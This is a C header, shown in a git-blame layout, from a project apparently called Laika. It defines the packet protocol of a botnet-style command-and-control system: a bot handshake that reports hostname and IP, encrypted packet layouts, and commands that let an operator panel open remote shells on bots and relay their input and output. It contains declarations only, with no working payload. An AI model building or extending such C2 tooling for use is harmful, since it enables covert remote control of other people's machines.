2022-01-24 03:28:16 +00:00
|
|
|
#ifndef LAIKA_PACKET_H
|
|
|
|
#define LAIKA_PACKET_H
|
|
|
|
|
2022-02-17 23:24:46 +00:00
|
|
|
#include <inttypes.h>
|
|
|
|
|
2022-01-24 16:17:54 +00:00
|
|
|
#define LAIKA_MAGIC "LAI\x12"
|
|
|
|
#define LAIKA_MAGICLEN 4
|
|
|
|
|
2022-01-25 19:53:17 +00:00
|
|
|
#define LAIKA_MAX_PKTSIZE 4096
|
|
|
|
|
2022-02-15 22:57:21 +00:00
|
|
|
#define LAIKA_HOSTNAME_LEN 64
|
2022-03-05 02:17:03 +00:00
|
|
|
#define LAIKA_IPV4_LEN INET_ADDRSTRLEN
|
|
|
|
#define LAIKA_INET_LEN INET_ADDRSTRLEN
|
2022-02-15 22:57:21 +00:00
|
|
|
|
2022-02-21 23:25:49 +00:00
|
|
|
#define LAIKA_SHELL_DATA_MAX_LENGTH 256
|
|
|
|
|
2022-02-03 22:25:49 +00:00
|
|
|
/* first handshake between peer & cnc works as so:
|
2022-02-17 22:55:42 +00:00
|
|
|
- peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip
|
2022-02-03 22:25:49 +00:00
|
|
|
- after cnc receives LAIKAPKT_HANDSHAKE_REQ, all packets are encrypted
|
|
|
|
- cnc responds with LAIKAPKT_HANDSHAKE_RES
|
|
|
|
- if peer is an authenticated client (panel), LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ is then sent
|
|
|
|
*/
|
2022-01-28 01:55:28 +00:00
|
|
|
|
2022-02-17 22:55:42 +00:00
|
|
|
/* encrypted packets are laid out like so: (any packet sent/received where peer->useSecure is true)
|
|
|
|
LAIKAPKT_ID pktID; -- plain text
|
|
|
|
uint8_t nonce[crypto_secretbox_NONCEBYTES]; -- plain text
|
|
|
|
uint8_t body[pktSize + crypto_secretbox_MACBYTES]; -- encrypted with shared key & nonce
|
|
|
|
*/
|
|
|
|
|
2022-02-21 23:25:49 +00:00
|
|
|
/*
|
|
|
|
any packet ending with *_RES is cnc 2 peer
|
|
|
|
any packet ending with *_REQ is peer 2 cnc
|
|
|
|
if packet doesn't have either, it can be sent & received by both peer & cnc
|
|
|
|
*/
|
2022-01-25 03:46:29 +00:00
|
|
|
enum {
|
2022-02-21 23:25:49 +00:00
|
|
|
/* ==================================================[[ Peer ]]================================================== */
|
|
|
|
LAIKAPKT_VARPKT,
|
|
|
|
/* layout of LAIKAPKT_VARPKT:
|
|
|
|
* LAIKAPKT_SIZE pktSize;
|
|
|
|
* LAIKAPKT_ID pktID;
|
|
|
|
*/
|
2022-02-17 22:55:42 +00:00
|
|
|
LAIKAPKT_HANDSHAKE_REQ, /* first packet sent by peer & received by cnc */
|
2022-02-28 22:27:55 +00:00
|
|
|
/* layout of LAIKAPKT_HANDSHAKE_REQ: *NOTE* ALL DATA IN THIS PACKET IS SENT IN PLAINTEXT!!
|
2022-02-17 22:55:42 +00:00
|
|
|
* uint8_t laikaMagic[LAIKA_MAGICLEN]; -- LAIKA_MAGIC
|
2022-01-28 01:55:28 +00:00
|
|
|
* uint8_t majorVer;
|
|
|
|
* uint8_t minorVer;
|
2022-02-03 22:25:49 +00:00
|
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
2022-02-17 22:55:42 +00:00
|
|
|
* char hostname[LAIKA_HOSTNAME_LEN]; -- can be empty (ie. all NULL bytes)
|
2022-03-05 02:17:03 +00:00
|
|
|
* char inet[LAIKA_INET_LEN]; -- can be empty (ie. all NULL bytes)
|
2022-01-28 01:55:28 +00:00
|
|
|
*/
|
2022-01-24 03:28:16 +00:00
|
|
|
LAIKAPKT_HANDSHAKE_RES,
|
2022-01-28 01:55:28 +00:00
|
|
|
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
2022-02-17 22:55:42 +00:00
|
|
|
* uint8_t cncEndian;
|
2022-01-28 01:55:28 +00:00
|
|
|
*/
|
2022-02-21 23:25:49 +00:00
|
|
|
LAIKAPKT_SHELL_OPEN, /* if sent to bot, opens a shell. if sent to cnc, signifies you opened a shell */
|
|
|
|
/* layout of LAIKAPKT_SHELL_OPEN:
|
2022-02-28 22:27:55 +00:00
|
|
|
* NULL (empty packet)
|
2022-02-21 23:25:49 +00:00
|
|
|
*/
|
|
|
|
LAIKAPKT_SHELL_CLOSE, /* if sent to bot, closes a shell. if sent to cnc, signifies a shell was closed */
|
|
|
|
/* layout of LAIKAPKT_SHELL_CLOSE:
|
2022-02-28 22:27:55 +00:00
|
|
|
* NULL (empty packet)
|
2022-02-21 23:25:49 +00:00
|
|
|
*/
|
|
|
|
LAIKAPKT_SHELL_DATA, /* if sent to bot, writes data to stdin of shell. if sent to cnc, writes to 'stdout' of shell */
|
|
|
|
/* layout of LAIKAPKT_SHELL_DATA
|
2022-02-25 04:13:05 +00:00
|
|
|
* char buf[VAR_PACKET_LENGTH];
|
2022-02-21 23:25:49 +00:00
|
|
|
*/
|
|
|
|
/* ==================================================[[ Auth ]]================================================== */
|
2022-02-17 22:55:42 +00:00
|
|
|
LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ, /* second packet sent by authenticated peers (panel). there is no response packet */
|
2022-02-03 22:25:49 +00:00
|
|
|
/* layout of LAIKAPKT_STAGE2_HANDSHAKE_REQ
|
|
|
|
* uint8_t peerType;
|
|
|
|
*/
|
2022-02-21 23:25:49 +00:00
|
|
|
LAIKAPKT_AUTHENTICATED_ADD_PEER_RES, /* notification that a peer has connected to the cnc */
|
|
|
|
/* layout of LAIKAPKT_AUTHENTICATED_ADD_PEER_RES
|
2022-02-10 22:56:40 +00:00
|
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
2022-02-15 22:57:21 +00:00
|
|
|
* char hostname[LAIKA_HOSTNAME_LEN];
|
2022-03-05 02:17:03 +00:00
|
|
|
* char inet[LAIKA_INET_LEN];
|
2022-02-15 22:57:21 +00:00
|
|
|
* char ipv4[LAIKA_IPV4_LEN];
|
2022-02-13 00:21:59 +00:00
|
|
|
* uint8_t peerType;
|
2022-02-10 22:56:40 +00:00
|
|
|
*/
|
2022-02-21 23:25:49 +00:00
|
|
|
LAIKAPKT_AUTHENTICATED_RMV_PEER_RES, /* notification that a peer has disconnected from the cnc */
|
|
|
|
/* layout of LAIKAPKT_AUTHENTICATED_RMV_PEER_RES
|
2022-02-10 22:56:40 +00:00
|
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
2022-02-13 00:21:59 +00:00
|
|
|
* uint8_t peerType;
|
2022-02-10 22:56:40 +00:00
|
|
|
*/
|
2022-03-05 02:17:03 +00:00
|
|
|
LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ, /* panel requesting cnc open a shell on bot. there is no response packet, shell is assumed to be open */
|
2022-02-25 04:13:05 +00:00
|
|
|
/* layout of LAIKAPKT_AUTHENTICATE_OPEN_SHELL_REQ
|
|
|
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
|
|
|
*/
|
2022-03-02 16:38:16 +00:00
|
|
|
LAIKAPKT_AUTHENTICATED_SHELL_CLOSE, /* peer requesting close their currently opened shell (accepted by both cnc & panel) */
|
|
|
|
/* layout of LAIKAPKT_AUTHENTICATED_SHELL_CLOSE_REQ:
|
|
|
|
* NULL (empty packet)
|
2022-02-25 04:13:05 +00:00
|
|
|
*/
|
|
|
|
LAIKAPKT_AUTHENTICATED_SHELL_DATA, /* if sent to cnc, writes data to stdin of shell. if sent to panel, writes to 'stdout' of shell */
|
|
|
|
/* layout of LAIKAPKT_SHELL_DATA
|
|
|
|
* char buf[VAR_PACKET_LENGTH];
|
|
|
|
*/
|
2022-01-24 03:28:16 +00:00
|
|
|
LAIKAPKT_MAXNONE
|
2022-01-25 03:46:29 +00:00
|
|
|
};
|
2022-01-24 03:28:16 +00:00
|
|
|
|
2022-01-25 19:53:17 +00:00
|
|
|
typedef uint8_t LAIKAPKT_ID;
|
|
|
|
typedef uint16_t LAIKAPKT_SIZE;
|
|
|
|
|
2022-01-24 03:28:16 +00:00
|
|
|
#endif
|